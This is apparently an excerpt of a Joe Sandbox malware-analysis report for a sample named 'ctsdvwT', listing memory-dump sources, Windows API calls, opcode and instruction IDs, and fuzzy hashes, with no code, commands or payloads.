                                • Instruction Fuzzy Hash: CC11F2B18007598FDB50DF9AD984B9EBBF4EB49310F20842AD559A7250C378A944CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 060EE1C5
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: f21b8acbb7106e79f0e41519d8c370c653505fd849f715ebf871350bc258f595
                                • Instruction ID: 7d12e40998aac71a0dc97759f8841303cc56f4821f6f0c5ad9a1bc34a3224a30
                                • Instruction Fuzzy Hash: 861106B58007498FDB50DF9AC444BDEBBF4EB48310F20846AD559A7600D375A584CFA5

                                Control-flow Graph
                                • Function 60e78ca-60e7960, calling GetModuleHandleW (rendered graph not reproduced)
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 060E7936
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 630d6b303fdb7dda78e1f9f5788337b219e56ea2da4e29c87a9f18f002a6ecd1
                                • Instruction ID: 456f05e8e1274857ef27e82891881286004e0b41d84be77e60980a36f4e6f832
                                • Instruction Fuzzy Hash: 3011CDB6C006598FDB10CF9AC944BDEBBF4AF48320F15842AD469BB610D379A545CFA1
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,060ED87D), ref: 060ED907
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2548454833.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_60e0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 9a36b24fd1f7e6f1acddab5ab2dd0645e1db8cf8b4d7c180ffd366ef4a570be8
                                • Instruction ID: 99cb0888d294184fbe7edecdd27d5117c701cb09da66aabb9ee055d9f945d598
                                • Instruction Fuzzy Hash: 021100B18003598FDB50CF9AD884BDEBBF4FB48324F20842AD558A7650C7B4A944CFA5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek
                                • API String ID: 0-172235318
                                • Opcode ID: 9dfe9771f0429d940915890fb3f98209da5b032e04f9ff8b892b8a7b90f098ef
                                • Instruction ID: 4559ffe9c9ff1fa4f37591f9fc0e25e473e6b823c0c8dc7f4230a89c143a0c12
                                • Instruction Fuzzy Hash: 0AA19D70E1024ADFDF12DFA8D8857EDBBF2BF48704F148229E614A7291DB749885CB91
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: x
                                • API String ID: 0-2363233923
                                • Opcode ID: af36d3f67bc36e24260dc10e642618c8f90fd70a9fe9c2ae3ca5d11674e0846a
                                • Instruction ID: a69e9005004e34e24787358a044b04b96985ed93b7de5058a71174dbacd73f43
                                • Instruction Fuzzy Hash: 8611A031A112568FDF22EFBC94842ADBBF4EB48354B18057DD905EB282DB36D842CB94
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e8d257a17d51b09653a780a7ada06e32d136365bca571537c2466915034a8a4
                                • Instruction ID: 84e0262d9174511e9f3dd4df2505082ace798c25cabc72fee624e73cee6ab013
                                • Instruction Fuzzy Hash: 75D18070A102058FDF15DFA9D9847AEBBB1FB88314F10866AE51AEB293D771DC81CB50
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 608c41377c4ca1bc96c471deaaa323e1e91c10b2ceb986117a4919a1213d463c
                                • Instruction ID: 3a614aadbab61cfb7b969b9a81cdc4bdfeb64636a99616cb4a0340ed42c2345b
                                • Instruction Fuzzy Hash: 2AB191307112028BDF16A778E99522D77A2EFC9310F108929E146DB386DF36ED82C791
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc9f1943cd30e472538db7be76a7645be9b0bcc17f048e63bfd1afe13af8f45c
                                • Instruction ID: c2bba80363f8655b18a56af38cb5ef7270aba0a98d4b8ee9701d25dbc87acbb4
                                • Instruction Fuzzy Hash: 0CA19FB0E1024ACFDB11EFA9D88179DBBF1BF48714F14C629DA14E7295EB749881CB81
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fdf6e88c46aa073abeea2a31856567132dd8f3251016f2b8ba0ceb4d8060dc2f
                                • Instruction ID: f0be4f8a158218588a344a3e4d1b819625794b61572a532c824c8f071e6da21b
                                • Instruction Fuzzy Hash: F15104B0D103198FDB15CFA9C885B9DBBB1BF48310F14822AE915BB391D774A844CF95
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1fa5e4d9b6f3d80b8349f9c42e5da829f7c2a5f22bc0e93065b2ee0778feec10
                                • Instruction ID: aab2e114c0a0ca9defbade2f60c817854b677531c5ad23846664d6b2764c1779
                                • Instruction Fuzzy Hash: A751F5B0D103198FDB15CFA9C845B9DBBB1BF48710F14822AE915BB391D774A844CF95
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9217433077f281affe1f88b6e6614ff7fd3292781afbe86468fcfcf5adab2747
                                • Instruction ID: 2caf8c797841b98f5d57e12452eff1a9e0ec11216e8944497abe09be314d3143
                                • Instruction Fuzzy Hash: 3251FA71206282CFDB46FB69FD90B5A3B69BBD6204700996DD000DB27ADE707D59CB82
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c1b1f3fd3debdf7e296b76b092db65fa6a1545dae3653358435855d3d0183de7
                                • Instruction ID: fed5bf3dbb78ef0d38d8487a05dc847fbccd84f5bbfd5089ebdb543bf1747172
                                • Instruction Fuzzy Hash: D851FC71206282CFDB46FB69FD90B563B65BBD6204700996DD000DB27ADE707D59CB82
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9fede2b5bd70f33bac91053385ea07470b476911445351962dfd46cfa0bcd625
                                • Instruction ID: 70c30b5e804cfe4aea3d7fb305d1d2b8380f8312db5fd81c9fd8871d7cb18e44
                                • Instruction Fuzzy Hash: 6A3114307002058FDB06AB78D55876F7BA3AF88650F254A6DD006EB392EF35DC46C791
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f484b9140b4d62bc11263e42732ea8779832a1da3dd4324376b33039dea3ad4
                                • Instruction ID: 28f70fc16665a98d91eadd3e3a1444d2be88616ab9732fba4a6934f378f94c71
                                • Instruction Fuzzy Hash: 5C317235E102069BDB1ADF68D49469EBBB6FF88300F118919E516E7391EB70AC818B50
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf2c03232edfa74187d79959c4c419d9c2ea8ade8dfc2714d7887956317ebf3a
                                • Instruction ID: 1fbd7ae66e95069d35394c08be381a3a68f9edfdbc09dcb2eb3dd6b8fc30bc1c
                                • Instruction Fuzzy Hash: 24314330E202099FEB16CBA9C55579EB7B1FF89310F108625F945F7282EB70E941CB91
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 51152548ece8141db70174457057964527464726ff8ea6024538b579c18d3ee3
                                • Instruction ID: 65abf7afec84bb138850c829fbea705ac90a08f4cb04b3f925385ac5e7d04ce3
                                • Instruction Fuzzy Hash: AB41E1B4D00349DFDB15CFA9C584B9EBBF5BF48310F14842AE409AB250DB759945CB90
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0b65ca52437cb24a1daead307fd9c7dc4298f80575556e69d3964b4d425d7c58
                                • Instruction ID: 6c23f9df528758b7e23281e964e6e65bd599d86e026de0b95d388534604b39ab
                                • Opcode Fuzzy Hash: 0b65ca52437cb24a1daead307fd9c7dc4298f80575556e69d3964b4d425d7c58
                                • Instruction Fuzzy Hash: CC313430E2020A9FEB16CBA8C55579EBBB1FF45300F108629F945F7282EBB5E941CB51
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 209bc08b8959b0f0cb962be9b655809b7787981adf65d6beb5c3e026cda5f5aa
                                • Instruction ID: 5f9471eeedf5950f7b904e3322b9ebd63867036e132e3f84b835fc55959cdf7c
                                • Opcode Fuzzy Hash: 209bc08b8959b0f0cb962be9b655809b7787981adf65d6beb5c3e026cda5f5aa
                                • Instruction Fuzzy Hash: 71318134E102169BDB1ADFA8D49469EFBF6FF88300F108919E916E7381DB70AC81CB50
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef72b8c9a1ffc461a5a1d7a35433976b7107b78140b259a3efa277f050232134
                                • Instruction ID: df6e938c0caf7304c34e9914e44f783192d456295376acd36b242b9bf6961083
                                • Opcode Fuzzy Hash: ef72b8c9a1ffc461a5a1d7a35433976b7107b78140b259a3efa277f050232134
                                • Instruction Fuzzy Hash: 6541E0B4D00349DFEB14CFA9C584ADEBBF5FF48310F20842AE809AB250DB759985CB90
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 04b545f8e687595fc9920b35d2e5867ac53d1e341189b358d0ead5df71395e4c
                                • Instruction ID: e27c3367242b7bb77fb2aa7a5c3cbdec8c886a2cbb5c1553a891e1ff271820ce
                                • Opcode Fuzzy Hash: 04b545f8e687595fc9920b35d2e5867ac53d1e341189b358d0ead5df71395e4c
                                • Instruction Fuzzy Hash: 0D314B30610216CFDF1AEB78D5547AEB7B6AF48344B100668DA01EB295DB36DD41CFA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 583bb8c1f8086a52b7a9bb72736657587877314d4e8bd58bf324682a238c170b
                                • Instruction ID: 3208475aff1ed8c106a26aa361679bd87d176cca54c1b4922dc7fe45e0fa6c65
                                • Opcode Fuzzy Hash: 583bb8c1f8086a52b7a9bb72736657587877314d4e8bd58bf324682a238c170b
                                • Instruction Fuzzy Hash: 94315C30710216CFDF1AEB78D9547AEB7B6AF48244B100568D902EB395EB36DD41CBA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: df92cc3f7954008e382da0ffdb7f40e3d9c6907ae28f4b1963b39c1581c1bd3c
                                • Instruction ID: 41363c0e54898b76510bdecbe5115a96e1e158e6a68aea2b9dcebf6bdade1436
                                • Opcode Fuzzy Hash: df92cc3f7954008e382da0ffdb7f40e3d9c6907ae28f4b1963b39c1581c1bd3c
                                • Instruction Fuzzy Hash: F1315271E1020A9BDB16DF68D49469FFBB2FF89300F108615E515E7286EB709C45CB90
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44a45b848ce17d6c126af42917814b13c956fb16b34d24f530d19ef78bca2f43
                                • Instruction ID: 51a70d349a63666bcb2edc68fcb469c17ea205df95b819b50f46a871b9b04986
                                • Opcode Fuzzy Hash: 44a45b848ce17d6c126af42917814b13c956fb16b34d24f530d19ef78bca2f43
                                • Instruction Fuzzy Hash: DD213271E1020A9BDB1ADFA8D59469FF7B2FF89300F108619E515EB282EB719C45CB90
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 50091e779e38914e479e811d03a24eafba1c0e1b36fe319219d03da5c1c66fbc
                                • Instruction ID: f2b0f52f8d2c2993af5165c2366a1ac63cfbea66807b4fc15cbdd02ce6d49fd7
                                • Opcode Fuzzy Hash: 50091e779e38914e479e811d03a24eafba1c0e1b36fe319219d03da5c1c66fbc
                                • Instruction Fuzzy Hash: 88219F74A102438BEB33277CD48936E3761EB42311F150A69EA06DB2D7DF28CCA6C742
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de7e6f5d5090bbab5e398ba377f14a648287caf1f22de187619ee410ee7e6c32
                                • Instruction ID: 04a042a513f4d2efc2bd5097b5579a1b3b084c33b3478ff3ce7924463e682724
                                • Opcode Fuzzy Hash: de7e6f5d5090bbab5e398ba377f14a648287caf1f22de187619ee410ee7e6c32
                                • Instruction Fuzzy Hash: BB2184786101428FEF17FB6CE898B5E3769EB85305F108A25D106CB2A7DF34DCA18B91
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8993a034fcb684e655d667ca57ea76100c7986548bb973b0aec54897e7fcce8c
                                • Instruction ID: 86dd4adf5efcdc4a608510df6c734afb79c6c09bea4b4ac04b94210bec57871a
                                • Opcode Fuzzy Hash: 8993a034fcb684e655d667ca57ea76100c7986548bb973b0aec54897e7fcce8c
                                • Instruction Fuzzy Hash: 43213230E1061A9BDB19DFA8C55069FF7B2AF89300F10861AE915F7391EBB09845CB50
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 11e4364a5e0c841364f0ce15f7e5ca5fd25f8516c4c49efe6da5ecb1770097cf
                                • Instruction ID: f789b683bce28d772ee5f920faf41bf253b3ca259ac36ae6d2d0eb32e1f71e83
                                • Opcode Fuzzy Hash: 11e4364a5e0c841364f0ce15f7e5ca5fd25f8516c4c49efe6da5ecb1770097cf
                                • Instruction Fuzzy Hash: 42214B307101058FDB45EB39C958BAE7BF2EF4D200B104968E506EB3A1DB35AD00CBA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2538660323.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_ead000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 71b14a60b338b05d34772fff1ac7febcf78ab1a0a1230f2f8c5c1c9c510e81d2
                                • Instruction ID: 2d3ff3f4fb6a80056b5bcc54e8c4ed69534670c6d705ebecb7ef32601b9edbce
                                • Opcode Fuzzy Hash: 71b14a60b338b05d34772fff1ac7febcf78ab1a0a1230f2f8c5c1c9c510e81d2
                                • Instruction Fuzzy Hash: 8A212271608300DFDB14DF20D9C0B26BBA6EB89318F20C56DD84A5F692C336E847CA62
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f31005e39b7f2e7cb4c6d57711782826ec1fa1b239d362b6241c1892bd2a2725
                                • Instruction ID: 7eeaded6a33b1b829ea34ef6d7546395adbf041b921bbcad2aa016c0da12f6f1
                                • Opcode Fuzzy Hash: f31005e39b7f2e7cb4c6d57711782826ec1fa1b239d362b6241c1892bd2a2725
                                • Instruction Fuzzy Hash: 6A213B31B1020ACFEB16EB68C5547AE77F6AB49300F100668D605EB291DB36CD60CBA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09b1e6806118218e79753765a5eb2bdae4d9cd16a88771c0dd8657b9d085494b
                                • Instruction ID: 70b814b38dfdbf85b6add91cf668cfaad99c2d7eb8d228839dc80f305603be8a
                                • Opcode Fuzzy Hash: 09b1e6806118218e79753765a5eb2bdae4d9cd16a88771c0dd8657b9d085494b
                                • Instruction Fuzzy Hash: 43215E31B1020ACFEB16EB78C5557AE77F6AF49300F100668D605EB291DB76DD60CBA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 144c67632433139b3256403dd0cc863d93217bd99b667a90ccc11ec9418a9003
                                • Instruction ID: ad9e80cfbcacd7c050eef8ea74c90fca5e65d623e21c5394185a1293441b2fae
                                • Opcode Fuzzy Hash: 144c67632433139b3256403dd0cc863d93217bd99b667a90ccc11ec9418a9003
                                • Instruction Fuzzy Hash: 49213330E1061A9BDB1ADF68C45069FF7B2EF89310F10861AE915F7391EBB09845CB50
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b768b9fdeb96e0df212d262d6f3842055a217b7e693c54fe5288e92d0f89b90
                                • Instruction ID: 1610ddaafafdd5581eea72ef302a135b6deaefc476d0ee780f1f0cbff8936b41
                                • Opcode Fuzzy Hash: 2b768b9fdeb96e0df212d262d6f3842055a217b7e693c54fe5288e92d0f89b90
                                • Instruction Fuzzy Hash: 622175786101428FEF17F76CE89872E3755EB85305F108A25D106CB2A7DF34DCA58B91
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e30cef0e7295acd79d3e0656a80de4d5caee0310fe40734752b7d4426cf77748
                                • Instruction ID: 4fa5f04f4a2b63e9fdabbf7a1ac01ce5dfbf23828bdf679182d706052d5d849a
                                • Opcode Fuzzy Hash: e30cef0e7295acd79d3e0656a80de4d5caee0310fe40734752b7d4426cf77748
                                • Instruction Fuzzy Hash: B4211934B102058FDB55EF79C958BAE77F2EF4C200B104668E506EB3A1DB369D00CBA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2538660323.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_ead000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5091be75416883d272aaca3fd19eb1a9b32ed06084f440ced88e640f18b16de
                                • Instruction ID: 4159f68c5c734cc76c879bc8304fb4cb8449f33cce89d4f8b8b1a2e22e9b03ec
                                • Opcode Fuzzy Hash: d5091be75416883d272aaca3fd19eb1a9b32ed06084f440ced88e640f18b16de
                                • Instruction Fuzzy Hash: 7321417550D3808FCB12CF24D9D4715BF72AB46314F28C5EAD8498F6A7C33A984ACB62
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78fabafd37dbad28ef602a7c133e257a5ac54dec2aa5e2cf99da07891cfdc683
                                • Instruction ID: e0166ac4e809e288aedd4c67b467b4d29e4721e1cdc74d2230f7969d4d7e6db4
                                • Opcode Fuzzy Hash: 78fabafd37dbad28ef602a7c133e257a5ac54dec2aa5e2cf99da07891cfdc683
                                • Instruction Fuzzy Hash: DD114230B2020A9BFF27AA7DC8487693355FB45694F104A79E106DF283DA65CE868BC5
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6467a398bb15e967929633aa58ea8276a05d05662ef8af48a7fc5d281c4c42aa
                                • Instruction ID: 589705c2d109d70aea21882d812ee9af25a4371e28d63952c3e7d74b2e02ea8c
                                • Opcode Fuzzy Hash: 6467a398bb15e967929633aa58ea8276a05d05662ef8af48a7fc5d281c4c42aa
                                • Instruction Fuzzy Hash: 2E11C235F003079FDF51AB79980866F7BA9FB48750B104925EA05D3345EB34DA128791
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12f4c64cdc6967e8e319966141ef1e33da817319033f74c85173648ed9ddda87
                                • Instruction ID: 9e4c259cdfb58084d1c541ec4f4d06cfcb186f8d3e0aa51c2ec111cb4c4b7b3b
                                • Opcode Fuzzy Hash: 12f4c64cdc6967e8e319966141ef1e33da817319033f74c85173648ed9ddda87
                                • Instruction Fuzzy Hash: 72019231A112168FDF22EFBC94842ADBBF5EF48354B140579D905EB282EB32D852CB95
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d9319bc0f37f7f83520168f3472359473eb88571f0553165f4e4be73936f456a
                                • Instruction ID: 1db61ce9e9c35eaab80b55b588c9f859aa8c9fa378a9b6f4e02a0d2ee9e7bf70
                                • Opcode Fuzzy Hash: d9319bc0f37f7f83520168f3472359473eb88571f0553165f4e4be73936f456a
                                • Instruction Fuzzy Hash: 00019230A102048BDF00EFA5D94468ABBB5FF84310F54C264D90C6B296DBB0E945CBA1
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e49380453a4589ed9a8a7662dda96d9e0345b6c7f31496c2deef8f166bc3622f
                                • Instruction ID: 683339502269414e6e6d02f6dbdf34f2627f1ef077661813269066adc5f6aa1d
                                • Opcode Fuzzy Hash: e49380453a4589ed9a8a7662dda96d9e0345b6c7f31496c2deef8f166bc3622f
                                • Instruction Fuzzy Hash: 8A111230E2028ADFDF26EA9CD9847ECFB71AF61319F149629D310A21D2DB3448C5CB15
                                Memory Dump Source
                                • Source File: 0000000E.00000002.2544146227.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_1200000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
